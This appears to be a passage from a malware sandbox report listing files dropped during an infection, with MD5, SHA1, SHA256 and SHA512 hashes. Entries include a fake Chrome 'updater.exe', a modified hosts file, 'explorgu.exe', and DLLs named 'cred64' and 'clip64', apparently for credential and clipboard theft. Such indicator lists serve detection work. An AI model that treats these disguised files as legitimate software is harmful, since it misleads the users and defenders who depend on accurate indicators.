| SHA512 | eb83c2ebf918a211230b4f5c1a61fd5f0e7ca8091d1406159357ccc09ee3af7a1ac7ef4c5c16c8f22ee888a96d5eb2c24da6563eca1510b12201877a2b414339 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
C:\ProgramData\Google\Chrome\updater.exe
| MD5 | 3d233051324a244029b80824692b2ad4 |
| SHA1 | a053ebdacbd5db447c35df6c4c1686920593ef96 |
| SHA256 | fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84 |
| SHA512 | 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\opera_package
| MD5 | 8e234ebc7ada13a83034ede749b0bad2 |
| SHA1 | 6e921c590fab1b79ad1074451a7e3933b50a5733 |
| SHA256 | dc1edcb62279d45c8cf2bd99b56b6c9cd2042b11783057bd014c87819b9e21b9 |
| SHA512 | 1d89b764cec9a306e0ba06e65eb4917570a5bd85d265c1c4da5d319f4fb34c3346f20a695f1dcff9e6fd6cae6d57299fbb0f808b3686126728f38d58f9289741 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\additional_file0.tmp
| MD5 | 20d293b9bf23403179ca48086ba88867 |
| SHA1 | dedf311108f607a387d486d812514a2defbd1b9e |
| SHA256 | fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348 |
| SHA512 | 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
| MD5 | 10ab819cc1fd05db944a461213acf560 |
| SHA1 | c2e41cb4d74e28351437f7a879bea3355c210ebf |
| SHA256 | ea86bedcce197838b0817719f395b9fdc978d4b07be79703e2e0aae11212dd8e |
| SHA512 | 67ec7a885445de734e96545fc1646b6a86727c1d62ebde530ff3e1f0fe7d0afa5b9ca27d1b293f26f802358052bf46ad2815084c763d8678bd05148ac2d46512 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
| MD5 | d9898f7b271fb93f85edc56f6eb12df2 |
| SHA1 | dbbfa79af1636cb95cf1fc60c5bd5cfef3d1ffd7 |
| SHA256 | 7928244d487f29c60473295382bd2978ef80ad72a578d6fa6201d28d79d63b68 |
| SHA512 | fe5540f0805a24d40aefc4476ed0fe5daa48a3f0f02073eead782a8ba8d39f53407456746ce8b341c076fafc5d79457922d04caf202edcad059a421b08ece16b |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
| MD5 | 7b1d5aaede95bc464a6bc0494c0ffe07 |
| SHA1 | 8f1147308a389eb9aded7aec9eba9cbce2e25839 |
| SHA256 | 193d24c87e4f2c8ef05ae9b3b9c4e10248b9add7a38f228b4c6ebcf161bcb40c |
| SHA512 | 4ff9827818a7ac021383293dfb061ad0a6a5430ea38908c1a7243f06ae5c530a34fb5d2c69ff15ed23eadd62d27a5a6627a8549d9f1a09585d5ea8b53753d1d8 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
| MD5 | e06f8bf58534ef7c5124c4f78e7a07dd |
| SHA1 | c9d2e9f84318de88cd94e12d8a8635ff248b7190 |
| SHA256 | 0fc30d71b17cb17dab1088cb80aff056f64e59fa2c3f2b54d384bd8be34cba06 |
| SHA512 | f822eb539e027dc508142cf6188b6bff1fa098bd2dd7811fb9ed90031f3d2ecf56cdcef753e2563d06889a01c0a172c929826e59a2891676361558939315bccd |
C:\Users\Admin\AppData\Local\Temp\85CB.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
| MD5 | 6ee8b6a773f68a59355ce01c8466b2ff |
| SHA1 | 88cd545c2b9cc8f497e9f838d1dcbd029a753689 |
| SHA256 | 0734fa38d671afe3b31989f8fc560320269a9aab00a60458aada68366758dff9 |
| SHA512 | 5f2b88e257afebc8a274038940a47af9af1b301d2ffaf2df8105ad5140af9379c08024931b6f4202da9cc2f4b16dbee25e37f21e11f40fea956f2c0dc93278b0 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
| MD5 | bfeb92b427ed6d61a15de77c52d5b361 |
| SHA1 | 19e8a46b84041f30279a3470765d027279dde58e |
| SHA256 | d7f1d277b2493e73efeec2f396907bf6eb2d7da2b04d940801cc62486d2c0533 |
| SHA512 | 3274a96a7a78d7468c698aedf9829983afc6eed67a20a4ee9b3fb9a95e6e23af2be422c151d0b3a7c47eaec68719d27c516130d909dda16abe73fdf5494a8479 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\is-547OV.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Temp\is-547OV.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\BABY-Clock\is-MLNLP.tmp
| MD5 | 6231b452e676ade27ca0ceb3a3cf874a |
| SHA1 | f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1 |
| SHA256 | 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf |
| SHA512 | f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c |
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
| MD5 | bcd2b9aec7395eadf9810db8553c3742 |
| SHA1 | 7498390fe76cdb8200ec8413e56cafc2e96db396 |
| SHA256 | d0810b74655185eff13f1fd4005b04cf6e30b866601543c116bce7d6cc9e16a5 |
| SHA512 | ba69bdd35459b6081868bb9337318e62e334c49fbc9ec82b94c88ad8241cecb1480651af5e362ef0bcff3b01dd751951e8bba1fefa8b4df746ac39f34408152a |
C:\ProgramData\DHJDAFIE
| MD5 | 4c2e2189b87f507edc2e72d7d55583a0 |
| SHA1 | 1f06e340f76d41ea0d1e8560acd380a901b2a5bd |
| SHA256 | 99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca |
| SHA512 | 8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600 |
C:\ProgramData\FCAEBFIJ
| MD5 | 302e7bb88e0ca2e0a4b0fcb784f8e921 |
| SHA1 | 79304b5359b5a5ffa222a48373d214ff7bdca8e9 |
| SHA256 | 0583a074f22df06e2e66267c0cd1789e77849b6e7efaf9409baf814e95374f7b |
| SHA512 | b15a5c71ba415d794690d49ba1585866a88e3d437c95c5e78f057a22108c6018441df3ee4a66b05133999fb42a043423317792f785ac2d42c8a73bee33c805b6 |
C:\ProgramData\OutStep.txt
| MD5 | 74969bd8528b1b57ffca52e0bc7b3b54 |
| SHA1 | ecc0a25b31ba6c60c1125693a027bc9cb401c707 |
| SHA256 | 03552373b313b775ae58f0c3cc4bdc9e4fa640ad0763c58188b761d1395a8bc2 |
| SHA512 | 608a98eb531e417b99f5cfc6069ca5220b6ffe2624ca7b3c2e2c379a2595716b55f08906f3a6289ff4a485bfcd72def5cf4ae8ca58aa84e2b483fa48c1b38006 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 47b22c695811b64b1c8ff3933f9ea6da |
| SHA1 | 546e84c0f5b0062701a52f7fa7c22db48cc73cfd |
| SHA256 | a560208d6f4bc9b797926c8621f3657071918c88389c31e5a8a8851bb77bac07 |
| SHA512 | a5342e8b3be45e1487f3356827796852c51c783d262ecebed6636402f38c40786027d10f9979135dda528ccb6e6d4931f92177a1c9e0d91da37919034268ac40 |
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
| MD5 | 3960abf1cf1e42dee448bcd6d09381b1 |
| SHA1 | 1c92cad57ae12fa79d31b3a61560c0ac82cdda24 |
| SHA256 | 9175e09343e8232774e9e74dc214ca5a1348ee88146ab9ea1f4c44d48905736c |
| SHA512 | 9e72eb8035d578f3a473d8907d8058cd84eb7f8f1e8e9caa512a87aebbffce7a302af95a030a919408ac050d7fdd0f962e9c4f59ba89963508951ad546accfd9 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | 92fbdfccf6a63acef2743631d16652a7 |
| SHA1 | 971968b1378dd89d59d7f84bf92f16fc68664506 |
| SHA256 | b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72 |
| SHA512 | b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 2afdbe3b99a4736083066a13e4b5d11a |
| SHA1 | 4d4856cf02b3123ac16e63d4a448cdbcb1633546 |
| SHA256 | 8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee |
| SHA512 | d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f |